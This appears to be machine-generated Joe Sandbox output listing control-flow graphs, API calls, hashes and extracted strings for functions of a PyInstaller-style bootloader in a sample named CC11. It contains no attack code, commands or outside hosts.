                                                                                                                                                                  control_flow_graph 179 7ff6900118f0-7ff69001192b call 7ff690013f70 182 7ff690011bc1-7ff690011be5 call 7ff69001b870 179->182 183 7ff690011931-7ff690011971 call 7ff6900176a0 179->183 188 7ff690011977-7ff690011987 call 7ff69001f9f4 183->188 189 7ff690011bae-7ff690011bb1 call 7ff69001f36c 183->189 194 7ff690011989-7ff69001199c call 7ff690012760 188->194 195 7ff6900119a1-7ff6900119bd call 7ff69001f6bc 188->195 192 7ff690011bb6-7ff690011bbe 189->192 192->182 194->189 200 7ff6900119d7-7ff6900119ec call 7ff690024154 195->200 201 7ff6900119bf-7ff6900119d2 call 7ff690012760 195->201 206 7ff690011a06-7ff690011a87 call 7ff690011bf0 * 2 call 7ff69001f9f4 200->206 207 7ff6900119ee-7ff690011a01 call 7ff690012760 200->207 201->189 215 7ff690011a8c-7ff690011a9f call 7ff690024170 206->215 207->189 218 7ff690011ab9-7ff690011ad2 call 7ff69001f6bc 215->218 219 7ff690011aa1-7ff690011ab4 call 7ff690012760 215->219 224 7ff690011aec-7ff690011b08 call 7ff69001f430 218->224 225 7ff690011ad4-7ff690011ae7 call 7ff690012760 218->225 219->189 230 7ff690011b0a-7ff690011b16 call 7ff6900125f0 224->230 231 7ff690011b1b-7ff690011b29 224->231 225->189 230->189 231->189 233 7ff690011b2f-7ff690011b3e 231->233 235 7ff690011b40-7ff690011b46 233->235 236 7ff690011b48-7ff690011b55 235->236 237 7ff690011b60-7ff690011b6f 235->237 238 7ff690011b71-7ff690011b7a 236->238 237->237 237->238 239 7ff690011b7c-7ff690011b7f 238->239 240 7ff690011b8f 238->240 239->240 242 7ff690011b81-7ff690011b84 239->242 241 7ff690011b91-7ff690011bac 240->241 241->189 241->235 242->240 243 7ff690011b86-7ff690011b89 242->243 243->240 244 7ff690011b8b-7ff690011b8d 243->244 244->241
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _fread_nolock$Message
                                                                                                                                                                  • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                  • API String ID: 677216364-3497178890
                                                                                                                                                                  • Opcode ID: 1cb2d85d5cc1e405446bb646beb60a09ea5b3a7daa30bb022579de459a0b6986
                                                                                                                                                                  • Instruction ID: c6ec25d58129f3898a73b6695eec0cc0cbdd8efc9c084f79fb128f5bd52e115b
                                                                                                                                                                  • Opcode Fuzzy Hash: 1cb2d85d5cc1e405446bb646beb60a09ea5b3a7daa30bb022579de459a0b6986
                                                                                                                                                                  • Instruction Fuzzy Hash: 92719231A0CA86A5EBB5CB34E4906F923A5EF4878CF444075EA8DC779DEF2CE5458B00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 245 7ff6900115c0-7ff6900115d1 246 7ff6900115f7-7ff690011611 call 7ff690013f70 245->246 247 7ff6900115d3-7ff6900115dc call 7ff690011050 245->247 252 7ff69001163b-7ff690011655 call 7ff690013f70 246->252 253 7ff690011613-7ff69001163a call 7ff690012760 246->253 254 7ff6900115ee-7ff6900115f6 247->254 255 7ff6900115de-7ff6900115e9 call 7ff6900125f0 247->255 261 7ff690011657-7ff69001166c call 7ff6900125f0 252->261 262 7ff690011671-7ff690011688 call 7ff69001f9f4 252->262 255->254 267 7ff6900117c5-7ff6900117c8 call 7ff69001f36c 261->267 268 7ff69001168a-7ff6900116a6 call 7ff690012760 262->268 269 7ff6900116ab-7ff6900116af 262->269 275 7ff6900117cd-7ff6900117df 267->275 278 7ff6900117bd-7ff6900117c0 call 7ff69001f36c 268->278 272 7ff6900116c9-7ff6900116e9 call 7ff690024170 269->272 273 7ff6900116b1-7ff6900116bd call 7ff6900111f0 269->273 282 7ff6900116eb-7ff690011707 call 7ff690012760 272->282 283 7ff69001170c-7ff690011717 272->283 279 7ff6900116c2-7ff6900116c4 273->279 278->267 279->278 290 7ff6900117b3-7ff6900117b8 282->290 285 7ff6900117a6-7ff6900117ae call 7ff69002415c 283->285 286 7ff69001171d-7ff690011726 283->286 285->290 289 7ff690011730-7ff690011752 call 7ff69001f6bc 286->289 294 7ff690011754-7ff69001176c call 7ff69001fdfc 289->294 295 7ff690011785-7ff69001178c 289->295 290->278 300 7ff69001176e-7ff690011771 294->300 301 7ff690011775-7ff690011783 294->301 297 7ff690011793-7ff69001179c call 7ff690012760 295->297 304 7ff6900117a1 297->304 300->289 303 7ff690011773 300->303 301->297 303->304 304->285
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message
                                                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                  • API String ID: 2030045667-1550345328
                                                                                                                                                                  • Opcode ID: 87dd95af00602e0483b2d31c7e05800b7ac94f6c55a4757f68a6d2680965d63d
                                                                                                                                                                  • Instruction ID: ee742e4f6f097153597633819966c6b8083df9f4d1c47e0dab09a000bea35550
                                                                                                                                                                  • Opcode Fuzzy Hash: 87dd95af00602e0483b2d31c7e05800b7ac94f6c55a4757f68a6d2680965d63d
                                                                                                                                                                  • Instruction Fuzzy Hash: 3951AC21B0CA43A2EA759B35A8405B923A5FF88B9CF4441B1EE1C877DDEF3CE5558700

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                  • API String ID: 2895956056-699529898
                                                                                                                                                                  • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                  • Instruction ID: 98b1619266e7276d40818b8af2a6d3fe626508889facaf9dce3d4a688e65152f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                  • Instruction Fuzzy Hash: 25411C32A18B8291DA309B34F4552AE73A1FBC9364F500375E6AD877D9DF7CD1458B40

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message
                                                                                                                                                                  • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                  • API String ID: 2030045667-2813020118
                                                                                                                                                                  • Opcode ID: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
                                                                                                                                                                  • Instruction ID: b8229354cb737035eb547da92c6e0298408ba426b6b28c7a675c58376e249db5
                                                                                                                                                                  • Opcode Fuzzy Hash: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
                                                                                                                                                                  • Instruction Fuzzy Hash: 5651C122A08A42A1EAB59B36A4403FA6295FF8479CF444175EE5DC7BDDEF3CE542C700

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF69002E3BA,?,?,-00000018,00007FF69002A063,?,?,?,00007FF690029F5A,?,?,?,00007FF69002524E), ref: 00007FF69002E19C
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF69002E3BA,?,?,-00000018,00007FF69002A063,?,?,?,00007FF690029F5A,?,?,?,00007FF69002524E), ref: 00007FF69002E1A8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                  • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                  • Instruction ID: d0defe813a72f8529ad1aa1cff3ddcf350b369db17ed7d5ce06ddcad7963068c
                                                                                                                                                                  • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C41D131B19A42A1FA36CB3AA8006752796FF49BA0F484175EE1DC778CEE7CE4568300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF690013834), ref: 00007FF690017CE4
                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF690013834), ref: 00007FF690017D2C
                                                                                                                                                                    • Part of subcall function 00007FF690017E10: GetEnvironmentVariableW.KERNEL32(00007FF69001365F), ref: 00007FF690017E47
                                                                                                                                                                    • Part of subcall function 00007FF690017E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF690017E69
                                                                                                                                                                    • Part of subcall function 00007FF690027548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690027561
                                                                                                                                                                    • Part of subcall function 00007FF6900126C0: MessageBoxW.USER32 ref: 00007FF690012736
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                  • API String ID: 740614611-1339014028
                                                                                                                                                                  • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                  • Instruction ID: 582e2f5395253aec387d1e83e57f5de326240f7cfe8f1735a6deca2948ca138d
                                                                                                                                                                  • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                  • Instruction Fuzzy Hash: 9141A511B09A4660FAB1EB75A9556F92361EF897C8F8000B1EE1DC77DEEE3CE5818340

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 572 7ff69002ad6c-7ff69002ad92 573 7ff69002adad-7ff69002adb1 572->573 574 7ff69002ad94-7ff69002ada8 call 7ff6900243d4 call 7ff6900243f4 572->574 575 7ff69002b187-7ff69002b193 call 7ff6900243d4 call 7ff6900243f4 573->575 576 7ff69002adb7-7ff69002adbe 573->576 588 7ff69002b19e 574->588 595 7ff69002b199 call 7ff690029bf0 575->595 576->575 579 7ff69002adc4-7ff69002adf2 576->579 579->575 582 7ff69002adf8-7ff69002adff 579->582 585 7ff69002ae18-7ff69002ae1b 582->585 586 7ff69002ae01-7ff69002ae13 call 7ff6900243d4 call 7ff6900243f4 582->586 591 7ff69002ae21-7ff69002ae27 585->591 592 7ff69002b183-7ff69002b185 585->592 586->595 593 7ff69002b1a1-7ff69002b1b8 588->593 591->592 596 7ff69002ae2d-7ff69002ae30 591->596 592->593 595->588 596->586 599 7ff69002ae32-7ff69002ae57 596->599 600 7ff69002ae59-7ff69002ae5b 599->600 601 7ff69002ae8a-7ff69002ae91 599->601 603 7ff69002ae5d-7ff69002ae64 600->603 604 7ff69002ae82-7ff69002ae88 600->604 605 7ff69002ae66-7ff69002ae7d call 7ff6900243d4 call 7ff6900243f4 call 7ff690029bf0 601->605 606 7ff69002ae93-7ff69002aebb call 7ff69002c90c call 7ff690029c58 * 2 601->606 603->604 603->605 608 7ff69002af08-7ff69002af1f 604->608 637 7ff69002b010 605->637 633 7ff69002aed8-7ff69002af03 call 7ff69002b594 606->633 634 7ff69002aebd-7ff69002aed3 call 7ff6900243f4 call 7ff6900243d4 606->634 611 7ff69002af9a-7ff69002afa4 call 7ff690032c2c 608->611 612 7ff69002af21-7ff69002af29 608->612 624 7ff69002afaa-7ff69002afbf 611->624 625 7ff69002b02e 611->625 612->611 616 7ff69002af2b-7ff69002af2d 612->616 616->611 620 7ff69002af2f-7ff69002af45 616->620 620->611 626 7ff69002af47-7ff69002af53 620->626 624->625 630 7ff69002afc1-7ff69002afd3 GetConsoleMode 624->630 628 7ff69002b033-7ff69002b053 ReadFile 625->628 626->611 631 7ff69002af55-7ff69002af57 626->631 635 7ff69002b059-7ff69002b061 628->635 636 7ff69002b14d-7ff69002b156 GetLastError 628->636 630->625 638 7ff69002afd5-7ff69002afdd 630->638 631->611 632 7ff69002af59-7ff69002af71 631->632 632->611 639 7ff69002af73-7ff69002af7f 632->639 633->608 634->637 635->636 641 7ff69002b067 635->641 644 7ff69002b158-7ff69002b16e call 7ff6900243f4 call 7ff6900243d4 636->644 645 7ff69002b173-7ff69002b176 636->645 646 7ff69002b013-7ff69002b01d call 7ff690029c58 637->646 638->628 643 7ff69002afdf-7ff69002b001 ReadConsoleW 638->643 639->611 648 7ff69002af81-7ff69002af83 639->648 652 7ff69002b06e-7ff69002b083 641->652 654 7ff69002b022-7ff69002b02c 643->654 655 7ff69002b003 GetLastError 643->655 644->637 649 7ff69002b009-7ff69002b00b call 7ff690024368 645->649 650 7ff69002b17c-7ff69002b17e 645->650 646->593 648->611 658 7ff69002af85-7ff69002af95 648->658 649->637 650->646 652->646 660 7ff69002b085-7ff69002b090 652->660 654->652 655->649 658->611 665 7ff69002b0b7-7ff69002b0bf 660->665 666 7ff69002b092-7ff69002b0ab call 7ff69002a984 660->666 669 7ff69002b13b-7ff69002b148 call 7ff69002a7c4 665->669 670 7ff69002b0c1-7ff69002b0d3 665->670 672 7ff69002b0b0-7ff69002b0b2 666->672 669->672 673 7ff69002b12e-7ff69002b136 670->673 674 7ff69002b0d5 670->674 672->646 673->646 676 7ff69002b0da-7ff69002b0e1 674->676 677 7ff69002b11d-7ff69002b128 676->677 678 7ff69002b0e3-7ff69002b0e7 676->678 677->673 679 7ff69002b0e9-7ff69002b0f0 678->679 680 7ff69002b103 678->680 679->680 681 7ff69002b0f2-7ff69002b0f6 679->681 682 7ff69002b109-7ff69002b119 680->682 681->680 683 7ff69002b0f8-7ff69002b101 681->683 682->676 684 7ff69002b11b 682->684 683->682 684->673
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                  • Instruction ID: e005b9805fc87ec86fd2092fc43cee55ef3e6e0f752feecedb6fa5bcf92668ee
                                                                                                                                                                  • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                  • Instruction Fuzzy Hash: 56C1C122A0C787A2EB719B3994502BE3792FF91B80F5541B1EA5D83799DE7CE856C300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 995526605-0
                                                                                                                                                                  • Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                  • Instruction ID: caaba141d6650ae7dd261c3e276eb61553160e369f13a72dacd188c2a5324921
                                                                                                                                                                  • Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D217631A0CA4291EB709B75E48463AA3A1FFC57A8F500275EA6D83BDDDF7CD4858740

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF690013534), ref: 00007FF690013411
                                                                                                                                                                    • Part of subcall function 00007FF6900129E0: GetLastError.KERNEL32(?,?,?,00007FF69001342E,?,00007FF690013534), ref: 00007FF690012A14
                                                                                                                                                                    • Part of subcall function 00007FF6900129E0: FormatMessageW.KERNEL32(?,?,?,00007FF69001342E), ref: 00007FF690012A7D
                                                                                                                                                                    • Part of subcall function 00007FF6900129E0: MessageBoxW.USER32 ref: 00007FF690012ACF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                  • API String ID: 517058245-2863816727
                                                                                                                                                                  • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                  • Instruction ID: f7e988efd3d34d4d1c3567dfdcaba566f27d1ad52ae0487ec60254b3518fd80e
                                                                                                                                                                  • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                  • Instruction Fuzzy Hash: DE218121B0C542B1FAB19B34E8417BA2251FF49388F8001B2D69DC77DEEF2CE5048700

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: GetCurrentProcess.KERNEL32 ref: 00007FF690017B70
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: OpenProcessToken.ADVAPI32 ref: 00007FF690017B83
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: GetTokenInformation.KERNELBASE ref: 00007FF690017BA8
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: GetLastError.KERNEL32 ref: 00007FF690017BB2
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: GetTokenInformation.KERNELBASE ref: 00007FF690017BF2
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF690017C0E
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: CloseHandle.KERNEL32 ref: 00007FF690017C26
                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF690013814), ref: 00007FF69001848C
                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF690013814), ref: 00007FF690018495
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                  • Opcode ID: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                  • Instruction ID: 9a7e1bc105953e1ca9a115c05ddec901fe9a170597832da6fcbccac4a3004707
                                                                                                                                                                  • Opcode Fuzzy Hash: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                  • Instruction Fuzzy Hash: D3216231A08742A2F660AB30E4557E973A1FF88784F8444B6EA4DC379ADF3CE545C740

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
